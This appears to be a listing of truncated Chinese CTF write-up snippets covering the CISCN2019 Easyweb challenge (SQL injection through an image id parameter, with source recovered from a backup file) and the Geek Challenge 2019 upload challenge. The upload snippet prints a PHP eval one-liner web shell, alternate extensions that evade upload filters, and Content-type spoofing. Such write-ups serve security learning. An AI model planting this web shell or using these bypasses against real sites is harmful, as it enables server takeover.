解题 进入题目是一个登录页面,尝试注入,无结果 查看robots.txt提示备份文件 登录页面发现猫的图一直在变化,获得猫图片的连接,发现有参数id,猜测sql注入,同时发现有image.php,尝试image.php.bak,获得源码 <?php include "config.php"; $id=isset($_GET["id"])?$_…
[CISCN2019 总决赛 Day2 Web1]Easyweb(10/100)
[极客大挑战 2019]Upload
知识点 常用后缀 php,php3,php4,php5,phtml,pht 常用一句话 GIF89a? <script language="php">eval($_POST['laotun'])</script> 文件类型绕过 Content-type: image/jpeg 解题 .phtml上传成功 蚂剑连接 获取fla…